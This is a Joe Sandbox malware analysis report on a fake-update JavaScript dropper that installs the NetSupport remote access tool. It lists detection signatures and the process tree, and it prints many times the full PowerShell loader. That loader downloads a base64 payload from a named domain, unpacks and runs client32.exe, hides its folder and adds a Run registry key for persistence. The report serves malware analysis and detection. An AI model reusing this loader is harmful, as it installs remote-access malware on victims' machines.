Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updates.js

Overview

General Information

Sample name:updates.js
Analysis ID:1475034
MD5:917ed9cb792f81537e24395e1505bf6c
SHA1:25fec4cba71614d8332cac3f4446fca039d1f33e
SHA256:d62447548f057c993c73fece105a22d98d2e2604e4f0cd26bb6821b2686e732f
Tags:FAKEUPDATESjsNetSupportRAT
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Snort IDS alert for network traffic
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5972 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 892 cmdline: "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 1772 cmdline: "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 1848 cmdline: "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
updates.jsINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x6dc632:$b1: ::WriteAllBytes(
  • 0x6dc512:$b2: ::FromBase64String(
  • 0x12a0b:$s3: reverse
  • 0x12af2:$s3: reverse
  • 0x3a5e3:$s3: reverse
  • 0x3a680:$s3: reverse
  • 0x3b449:$s3: reverse
  • 0x3b771:$s3: reverse
  • 0x3b8ea:$s3: reverse
  • 0x3b985:$s3: reverse
  • 0x3bdb1:$s3: reverse
  • 0x3be00:$s3: reverse
  • 0x3be1b:$s3: reverse
  • 0x3bf09:$s3: reverse
  • 0x3c413:$s3: reverse
  • 0x3c41d:$s3: reverse
  • 0xce0be:$s3: reverse
  • 0xd19a1:$s3: reverse
  • 0x123747:$s3: reverse
  • 0x123792:$s3: reverse
  • 0x16cda9:$s3: reverse

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000004.00000002.3402960435.0000000003482000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000006.00000002.2327778463.0000000001168000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 20 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      4.2.client32.exe.74ad0000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        6.2.client32.exe.74ad0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          7.0.client32.exe.f70000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            7.2.client32.exe.f70000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              7.2.client32.exe.74ad0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 23 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Base64 Encoded PowerShell Command Detected
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Sigma detected: Suspicious PowerShell Parameter Substring
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 5972, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BTGEEENA
                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                Sigma detected: PowerShell Download Pattern
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Sigma detected: PowerShell Web Download
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Sigma detected: Suspicious PowerShell Download - PoshModule
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = c4c2d99d-dce2-4c63-9b01-d2d05392ab2f Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; Engine Version = 5.1.19041.1682 Runspace ID = 3b0870e3-db3b-4747-a157-04326a65c331 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): 